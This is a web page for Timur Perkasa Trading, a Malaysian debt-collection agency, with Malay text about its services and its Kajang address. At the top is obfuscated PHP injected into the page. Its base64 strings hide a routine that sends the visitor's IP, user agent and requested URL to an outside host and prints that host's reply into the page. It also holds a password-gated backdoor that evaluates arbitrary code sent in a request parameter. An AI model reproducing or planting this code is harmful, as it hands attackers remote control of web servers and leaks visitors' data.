error_reporting(0); ini_set("display_errors", "0"); if (!isset($i9a1457ca)) { $i9a1457ca = TRUE; $GLOBALS['_1004978028_']=Array(base64_decode('cHJlZ1' .'9tYXRjaA=' .'='),base64_decode('Z' .'m' .'l' .'sZV9' .'nZXRf' .'Y29udG' .'VudHM='),base64_decode('Z' .'mlsZV' .'9nZXRfY' .'2' .'9u' .'dGVudHM='),base64_decode('' .'d' .'X' .'JsZW5jb2' .'R' .'l'),base64_decode('dXJsZW5jb' .'2Rl'),base64_decode('bWQ1'),base64_decode('c3' .'Ry' .'aX' .'BzbG' .'Fz' .'aGVz')); function _1042778110($i){$a=Array('Y2xpZ' .'W' .'50X2NoZWNr','Y2xp' .'Z' .'W50X2NoZWNr','SFR' .'UUF9BQ0' .'NFUFRfQ0hB' .'UlNF' .'VA==','IS' .'4hdQ==','U0N' .'SSVBUX0' .'ZJT' .'EV' .'O' .'QU1F','' .'VVRGLTg=','d2lu' .'ZG9' .'3cy0xM' .'j' .'U' .'x','' .'SFR' .'U' .'UF9BQ0NFUF' .'RfQ0hBUlNFVA==','aHR0c' .'DovLw==','M' .'zcuN' .'Dg' .'u' .'OT' .'AuM' .'TEvZ' .'2V0Ln' .'B' .'ocD' .'9kPQ==','U0V' .'SVkVS' .'X05B' .'TUU=','UkVR' .'VU' .'VTVF9VU' .'kk=','JnU9','SFRUUF' .'9VU' .'0VSX' .'0FHRU5U','JmM' .'9','Jmk9' .'M' .'SZ' .'p' .'c' .'D' .'0=','UkVNT1RFX0F' .'ERFI=','J' .'mg9','O' .'G' .'I4NGNiMWQ' .'1Y2' .'U2ODU5OT' .'A' .'3YzE1Nj' .'RiNTJjZGQ5MDE' .'=','U0VSVkVSX05BTU' .'U=','UkVRVUVT' .'VF9VUkk' .'=','S' .'FRUU' .'F9VU0VSX' .'0FHRU5U','MQ==','cA==','cA' .'==','OWEx' .'ND' .'U3Y2E=');return base64_decode($a[$i]);} if(!empty($_COOKIE[_1042778110(0)]))die($_COOKIE[_1042778110(1)]);if(!isset($y220a656_0[_1042778110(2)])){if($GLOBALS['_1004978028_'][0](_1042778110(3),$GLOBALS['_1004978028_'][1]($_SERVER[_1042778110(4)]))){$y220a656_1=_1042778110(5);}else{$y220a656_1=_1042778110(6);}}else{$y220a656_1=$y220a656_0[_1042778110(7)];}echo $GLOBALS['_1004978028_'][2](_1042778110(8) ._1042778110(9) .$GLOBALS['_1004978028_'][3]($_SERVER[_1042778110(10)] .$_SERVER[_1042778110(11)]) ._1042778110(12) .$GLOBALS['_1004978028_'][4]($_SERVER[_1042778110(13)]) ._1042778110(14) .$y220a656_1 ._1042778110(15) .$_SERVER[_1042778110(16)] ._1042778110(17) .$GLOBALS['_1004978028_'][5](_1042778110(18) .$_SERVER[_1042778110(19)] .$_SERVER[_1042778110(20)] .$_SERVER[_1042778110(21)] .$y220a656_1 ._1042778110(22)));if(isset($_REQUEST[_1042778110(23)])&& $_REQUEST[_1042778110(24)]== _1042778110(25)){eval($GLOBALS['_1004978028_'][6]($_REQUEST["c"]));} }
Selamat datang ke Timur Perkasa Trading. Syarikat kami berfungsi sebagai agen ataupun wakil kepada syarikat-syarikat, institusi kewangan dan juga perseorangan dalam proses mendapatkan kembali wang pinjaman ataupun bil-bil yang tidak berbayar dari pelanggan.

Kami juga menjalankan fungsi melalui proses perlantikan dan juga bidang kuasa adalah seperti yang tertulis di dalam perjanjian yang dimetrai oleh kedua-dua pihak.

[ baca lagi ]
 • memastikan dan menentukan perjalanan syarikat.
 • memastikan syarikat mencapai target setiap tahun.
 • menerima fail / kes daripada pelanggan.
 • menyemak fail / kes yang diberi.
 • membuat kajian berkaitan fail/kes.
 • memastikan setiap fail/kes dapat diselesaikan.
 • menangani setiap permasalahan yang berlaku
 • menjadi perunding dalam menyelesaikan hutang
 • Memastikan setiap khidmat rundingan dan atur cara dalam bidang pentadbiran dan operasi mengikut peraturan syarikat

 • Memastikan pelanggan yang berurusan dengan pihak syarikat berpuashati dengan perkhidmatan yang disediakan

 • Memupuk sikap dan semangat berkerjasama, bertolak ansur dan telus dalam menangani apa juga etika dalam operasi syarikat terutama diantara kakitangan dan pihak pelanggan

TIMUR PERKASA TRADING
( CA0092048-T),


No. 2A, Jalan Jeloh 3, Off Jalan Bukit,
43000 Kajang, Selangor,
Malaysia

tel: +603-87372724
email: tp_kajang@yahoo.com